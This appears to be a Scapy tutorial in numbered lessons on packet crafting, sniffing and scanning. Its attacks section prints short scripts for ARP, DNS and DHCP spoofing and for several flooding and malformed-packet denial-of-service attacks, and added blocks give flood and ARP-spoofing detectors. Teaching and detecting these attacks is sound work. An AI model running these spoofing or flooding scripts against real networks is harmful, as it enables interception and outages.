Set Up Your Environment

Lesson 1: Install Scapy

pip install scapy

Lesson 2: Verify Installation

python -c "import scapy; print(scapy.__version__)"

Lesson 3: Running Scapy in Interactive Mode

scapy

Lesson 4: Installing Scapy on Linux

sudo apt-get install python3-scapy

Lesson 5: Installing Scapy on Windows

pip install scapy

Lesson 6: Installing Scapy on macOS

brew install scapy

Lesson 7: Updating Scapy

pip install --upgrade scapy

Lesson 8: Running Scapy as Root

sudo scapy

Lesson 9: Setting Up Scapy Environment Variables

export SCAPY_VERBOSE=0

Lesson 10: Understanding Scapy's Dependencies

pip show scapy

Basics of Scapy

Lesson 11: Creating Simple Packets

from scapy.all import *
packet = IP(dst="8.8.8.8")/ICMP()
send(packet)
            

Lesson 12: Capturing Packets

from scapy.all import sniff

packets = sniff(count=5)
packets.show()
            

Lesson 13: Displaying Packet Summary

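from scapy.all import IP, ICMP

packet = IP(dst="8.8.8.8")/ICMP()
print(packet.summary())  # one-line summary
packet.show()            # full field-by-field view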
            

Lesson 14: Sending TCP Packets

from scapy.all import IP, TCP, send

packet = IP(dst="8.8.8.8")/TCP(dport=80)
send(packet)
            

Lesson 15: Saving and Loading Packets

from scapy.all import sniff, wrpcap, rdpcap

packets = sniff(count=5)  # capture a few packets to save
wrpcap('my_packets.pcap', packets)
loaded_packets = rdpcap('my_packets.pcap')
loaded_packets.show()
            

Intermediate Techniques

Lesson 16: Crafting Custom Packets

from scapy.all import IP, TCP

packet = IP(dst="192.168.1.1")/TCP(dport=1234, sport=12345, flags="S")
packet.show()
            

Lesson 17: Manipulating Packet Fields

from scapy.all import IP, TCP

packet = IP(dst="192.168.1.1")/TCP(dport=80)
packet[IP].ttl = 64
packet.show()
            

Lesson 18: Using Scapy with Other Tools

from scapy.all import IP, ICMP, sr1

response = sr1(IP(dst="example.com")/ICMP(), timeout=2)
if response is not None:  # sr1() returns None when nothing answers in time
    response.show()
            

Lesson 19: Advanced Packet Analysis

from scapy.all import TCP, sniff

packets = sniff(count=10)
for packet in packets:
    if packet.haslayer(TCP):
        print(packet[TCP].payload)
            

Lesson 20: Packet Injection Techniques

from scapy.all import IP, ICMP, send

packet = IP(dst="192.168.1.1")/ICMP()
send(packet, verbose=0)
            

Advanced Techniques

Lesson 21: Building Complex Packet Sequences

from scapy.all import IP, TCP, Raw, send

packet = IP(dst="192.168.1.1")/TCP(dport=80)/Raw(b"GET / HTTP/1.1\r\nHost: example.com\r\n\r\n")
send(packet)
            

Lesson 22: Performing Network Scanning

from scapy.all import ARP, Ether, srp

arp = ARP(pdst="192.168.1.1/24")
broadcast = Ether(dst="ff:ff:ff:ff:ff:ff")
request = broadcast/arp
result = srp(request, timeout=3, verbose=0)[0]
for sent, received in result:
    print(received.psrc)
            

Lesson 23: Detecting and Handling Packet Flooding

from scapy.all import ICMP, sniff

packets = sniff(timeout=10)
for packet in packets:
    if packet.haslayer(ICMP):
        print(packet.summary())
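
The loop above only lists ICMP packets; recognising a flood means measuring rate per target. The following is an added example, not part of the original page: a sliding-window counter per destination and traffic kind, with `classify()` as an adapter for packets delivered by Scapy's `sniff(prn=...)`. The window, threshold and sample traffic are assumed, constructed values.

```python
from collections import defaultdict, deque

class FloodDetector:
    """Sliding-window packet counter keyed by (destination, traffic kind)."""

    def __init__(self, window=1.0, threshold=100):
        self.window = window          # seconds (assumed value)
        self.threshold = threshold    # packets per window that trigger an alert (assumed)
        self.seen = defaultdict(deque)
        self.alerted = set()

    def observe(self, ts, dst, kind):
        """Record one packet; return (dst, kind, count) when a key first crosses the threshold."""
        key = (dst, kind)
        q = self.seen[key]
        q.append(ts)
        while q and ts - q[0] > self.window:
            q.popleft()                       # drop timestamps that left the window
        if len(q) > self.threshold and key not in self.alerted:
            self.alerted.add(key)
            return (dst, kind, len(q))
        if len(q) <= self.threshold:
            self.alerted.discard(key)         # re-arm once the rate drops
        return None

def classify(pkt):
    """Scapy adapter: map a sniffed packet to (time, dst, kind), or None to skip it.
    Live use: sniff(store=False, prn=lambda p: (e := classify(p)) and det.observe(*e))"""
    if not pkt.haslayer("IP"):
        return None
    kind = None
    if pkt.haslayer("TCP"):
        flags = int(pkt["TCP"].flags)
        if (flags & 0x12) == 0x02:            # SYN set, ACK clear
            kind = "syn"
        elif flags == 0x10:                   # bare ACK
            kind = "ack"
    elif pkt.haslayer("UDP"):
        kind = "udp"
    elif pkt.haslayer("ICMP") and pkt["ICMP"].type == 8:
        kind = "icmp-echo"
    return (float(pkt.time), pkt["IP"].dst, kind) if kind else None

def run_sample():
    """Constructed traffic: 150 SYNs within 0.75 s to one host, plus slow background pings."""
    det = FloodDetector(window=1.0, threshold=100)
    events = [(i * 0.005, "192.168.1.1", "syn") for i in range(150)]
    events += [(float(i), "192.168.1.20", "icmp-echo") for i in range(5)]
    events.sort()
    return [a for a in (det.observe(*e) for e in events) if a]
```
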
            

Lesson 24: Implementing Protocol Decoding

from scapy.all import IP, sniff

def custom_packet_handler(packet):
    if packet.haslayer(IP):
        ip_layer = packet.getlayer(IP)
        print(f"IP Layer: {ip_layer.src} -> {ip_layer.dst}")

sniff(prn=custom_packet_handler, count=5)
            

Lesson 25: Optimizing Scapy Performance

from scapy.all import conf
conf.verb = 0
            

Network Attacks & Defenses

ARP Spoofing: A type of attack where an attacker sends false ARP (Address Resolution Protocol) messages to associate the attacker's MAC address with the IP address of a legitimate device on the network.

from scapy.all import ARP, Ether, send
arp_response = ARP(op=2, pdst="192.168.1.1", psrc="192.168.1.100", hwdst="ff:ff:ff:ff:ff:ff")
send(Ether(dst="ff:ff:ff:ff:ff:ff")/arp_response)
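
Defensive counterpart, added here and not part of the original page: a monitor that records the sender IP-to-MAC binding of each ARP message and alerts when a known IP appears with a new MAC, when the Ethernet source disagrees with the ARP sender field, or when one MAC claims many addresses. The class and function names, the `max_ips_per_mac` tolerance and the sample messages are assumptions constructed for illustration; `on_packet()` adapts it to Scapy's `sniff()`.

```python
from collections import defaultdict

class ArpWatch:
    """Track sender IP-to-MAC bindings in ARP traffic and flag suspicious ones."""

    def __init__(self, max_ips_per_mac=3):
        self.ip_to_mac = {}
        self.mac_to_ips = defaultdict(set)
        self.max_ips_per_mac = max_ips_per_mac   # assumed tolerance for multi-homed hosts

    def observe(self, psrc, hwsrc, ether_src=None):
        """Feed one ARP message; return a list of alert strings (empty if clean)."""
        alerts = []
        hwsrc = hwsrc.lower()
        if psrc == "0.0.0.0":                    # ARP probe, asserts no binding
            return alerts
        if ether_src and ether_src.lower() != hwsrc:
            alerts.append(f"{psrc}: frame source {ether_src} differs from ARP sender {hwsrc}")
        known = self.ip_to_mac.get(psrc)
        if known and known != hwsrc:
            alerts.append(f"{psrc} moved from {known} to {hwsrc}")
        self.ip_to_mac[psrc] = hwsrc
        self.mac_to_ips[hwsrc].add(psrc)
        if len(self.mac_to_ips[hwsrc]) > self.max_ips_per_mac:
            alerts.append(f"{hwsrc} claims {len(self.mac_to_ips[hwsrc])} addresses")
        return alerts

def on_packet(watch, pkt):
    """Scapy adapter for sniff(filter="arp", store=False, prn=lambda p: on_packet(watch, p))."""
    if pkt.haslayer("ARP"):
        src = pkt["Ether"].src if pkt.haslayer("Ether") else None
        for alert in watch.observe(pkt["ARP"].psrc, pkt["ARP"].hwsrc, src):
            print("ARP ALERT:", alert)

# Constructed sample messages: (sender IP, sender MAC, Ethernet source)
SAMPLE = [
    ("192.168.1.50", "aa:aa:aa:aa:aa:01", "aa:aa:aa:aa:aa:01"),
    ("192.168.1.1", "aa:aa:aa:aa:aa:fe", "aa:aa:aa:aa:aa:fe"),   # gateway's real binding
    ("192.168.1.1", "bb:bb:bb:bb:bb:66", "bb:bb:bb:bb:bb:66"),   # same IP, new MAC
]

def run_sample():
    watch = ArpWatch()
    return [a for msg in SAMPLE for a in watch.observe(*msg)]
```
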
                

DNS Spoofing: A type of attack where an attacker alters the DNS (Domain Name System) lookup to redirect users to fake or malicious websites.

from scapy.all import DNS, DNSRR, IP, UDP, send
dns_response = IP(dst="192.168.1.1")/UDP(dport=53)/DNS(id=1, qr=1, ancount=1, an=DNSRR(rrname="example.com.", rdata="192.168.1.100"))
send(dns_response)
                

DHCP Spoofing: A type of attack where an attacker sets up a rogue DHCP (Dynamic Host Configuration Protocol) server to issue false IP addresses and other network settings to devices on the network.

from scapy.all import BOOTP, DHCP, Ether, IP, UDP, send
dhcp_offer = Ether(dst="ff:ff:ff:ff:ff:ff")/IP(src="192.168.1.1")/UDP(sport=67, dport=68)/BOOTP(op=2, yiaddr="192.168.1.100")/DHCP(options=[("message-type", "offer"), ("server_id", "192.168.1.1"), "end"])
send(dhcp_offer)
                

TCP SYN Flood: A type of denial-of-service (DoS) attack where an attacker sends a large number of SYN (synchronize) packets to a server, overwhelming it and making it unavailable to legitimate users.

from scapy.all import IP, TCP, send
for i in range(1000):
    send(IP(dst="192.168.1.1")/TCP(dport=80, flags="S"))
                

TCP ACK Flood: A type of denial-of-service (DoS) attack where an attacker sends a large number of ACK (acknowledgment) packets to a server, overwhelming it and making it unavailable to legitimate users.

from scapy.all import IP, TCP, send
for i in range(1000):
    send(IP(dst="192.168.1.1")/TCP(dport=80, flags="A"))
                

UDP Flood: A type of denial-of-service (DoS) attack where an attacker sends a large number of UDP (User Datagram Protocol) packets to a server, overwhelming it and making it unavailable to legitimate users.

from scapy.all import IP, UDP, send
for i in range(1000):
    send(IP(dst="192.168.1.1")/UDP(dport=80))
                

ICMP Flood: A type of denial-of-service (DoS) attack where an attacker sends a large number of ICMP (Internet Control Message Protocol) packets to a server, overwhelming it and making it unavailable to legitimate users.

from scapy.all import IP, ICMP, send
for i in range(1000):
    send(IP(dst="192.168.1.1")/ICMP())
                

Ping of Death: A type of denial-of-service (DoS) attack where an attacker sends a large ICMP echo request packet to a server, causing it to crash or become unavailable.

from scapy.all import IP, ICMP, send
packet = IP(dst="192.168.1.1")/ICMP()/b"A" * 65535
send(packet)
                

Land Attack: A type of denial-of-service (DoS) attack where an attacker sends a TCP SYN packet with the same source and destination IP address and port number, causing the server to crash or become unavailable.

from scapy.all import IP, TCP, send
packet = IP(src="192.168.1.1", dst="192.168.1.1")/TCP(sport=80, dport=80, flags="S")
send(packet)
                

Teardrop Attack: A type of denial-of-service (DoS) attack where an attacker sends a series of fragmented packets to a server, causing it to crash or become unavailable.

from scapy.all import IP, TCP, fragment, send
packet = IP(dst="192.168.1.1")/TCP(dport=80)/b"A" * 65535
fragments = fragment(packet, fragsize=800)
for frag in fragments:
    send(frag)
                

Smurf Attack: A type of denial-of-service (DoS) attack where an attacker sends a large number of ICMP echo request packets to a server, overwhelming it and making it unavailable to legitimate users.

from scapy.all import IP, ICMP, send
for i in range(1000):
    send(IP(dst="192.168.1.1", src="192.168.1.2")/ICMP())
                

Fraggle Attack: A type of denial-of-service (DoS) attack where an attacker sends a large number of UDP packets to a server, overwhelming it and making it unavailable to legitimate users.

from scapy.all import IP, UDP, send
for i in range(1000):
    send(IP(dst="192.168.1.1")/UDP(dport=7))
                

Scripting & Automation

Lesson 26: Writing Scapy Scripts

from scapy.all import *

def create_packet(destination):
    packet = IP(dst=destination)/ICMP()
    return packet

packet = create_packet("8.8.8.8")
send(packet)
            

Lesson 27: Automating Packet Analysis

from scapy.all import TCP, sniff

def packet_callback(packet):
    if packet.haslayer(TCP):
        print(packet.summary())

sniff(prn=packet_callback, count=10)
            

Lesson 28: Integrating Scapy with Python Scripts

from scapy.all import *

def send_custom_packet(dst_ip):
    packet = IP(dst=dst_ip)/TCP(dport=80, flags="S")
    send(packet)

send_custom_packet("192.168.1.1")
            

Lesson 29: Using Scapy for Scheduled Tasks

import time
from scapy.all import *

while True:
    packet = IP(dst="192.168.1.1")/ICMP()
    send(packet)
    time.sleep(60)  # send a packet every 60 seconds
            

Lesson 30: Automating Packet Capture and Analysis

from scapy.all import sniff

def packet_analysis(packet):
    print(packet.summary())

sniff(prn=packet_analysis, timeout=60)
            

Network Protocols

Lesson 31: Working with IP Protocols

from scapy.all import IP

packet = IP(dst="192.168.1.1")
packet.show()
            

Lesson 32: Understanding TCP/IP

from scapy.all import IP, TCP

packet = IP(dst="192.168.1.1")/TCP(dport=80)
packet.show()
            

Lesson 33: Exploring UDP Traffic

from scapy.all import IP, UDP

packet = IP(dst="192.168.1.1")/UDP(dport=1234)
packet.show()
            

Lesson 34: Analyzing ICMP Messages

from scapy.all import IP, ICMP

packet = IP(dst="8.8.8.8")/ICMP()
packet.show()
            

Lesson 35: Inspecting ARP Packets

from scapy.all import ARP, Ether

packet = Ether()/ARP(pdst="192.168.1.1")
packet.show()
            

Packet Manipulation

Lesson 36: Crafting Custom Packets

from scapy.all import IP, TCP

packet = IP(dst="192.168.1.1")/TCP(dport=80, sport=12345, flags="S")
packet.show()
            

Lesson 37: Modifying Packet Fields

from scapy.all import IP, TCP

packet = IP(dst="192.168.1.1")/TCP(dport=80)
packet[IP].ttl = 64
packet.show()
            

Lesson 38: Fragmenting Packets

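from scapy.all import IP, TCP, Raw, fragment

# Build the payload inside Raw(): `pkt/b"A" * n` multiplies the packet, not the bytes.
# 4000 bytes is used because a 65535-byte payload cannot fit in one IP datagram.
packet = IP(dst="192.168.1.1")/TCP(dport=80)/Raw(load=b"A" * 4000)
fragments = fragment(packet, fragsize=800)
for frag in fragments:
    frag.show()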
            

Lesson 39: Reassembling Fragmented Packets

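from scapy.all import IP, TCP, Raw, fragment, defragment

# Scapy's reassembly helper is defragment(); it returns the reassembled packets
fragments = fragment(IP(dst="192.168.1.1")/TCP(dport=80)/Raw(load=b"A" * 4000), fragsize=800)
reassembled_packets = defragment(fragments)
reassembled_packets[0].show()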
            

Lesson 40: Sending Raw Packets

from scapy.all import send, IP, TCP

packet = IP(dst="192.168.1.1")/TCP(dport=80, flags="S")
send(packet)  # send() already writes to a layer-3 raw socket; it takes no raw= argument
            

Troubleshooting & Debugging

Lesson 41: Debugging Scapy Scripts

from scapy.all import sniff

def packet_callback(packet):
    try:
        packet.show()
    except Exception as e:
        print(f"Error: {e}")

sniff(prn=packet_callback, count=10)
            

Lesson 42: Analyzing Packet Capture Files

from scapy.all import rdpcap

packets = rdpcap('capture.pcap')
for packet in packets:
    packet.show()
            

Lesson 43: Troubleshooting Network Issues

from scapy.all import ICMP, IP, sr1

response = sr1(IP(dst="192.168.1.1")/ICMP(), timeout=2)  # without a timeout, sr1() blocks until a reply arrives or it is interrupted
if response:
    response.show()
else:
    print("No response received")
            

Lesson 44: Verifying Packet Delivery

from scapy.all import IP, ICMP, sr1

response = sr1(IP(dst="192.168.1.1")/ICMP(), timeout=2)
if response:
    print("Packet delivered successfully")
else:
    print("Packet delivery failed")
            

Lesson 45: Monitoring Network Traffic

from scapy.all import sniff

def monitor_traffic(packet):
    print(packet.summary())

sniff(prn=monitor_traffic, timeout=30)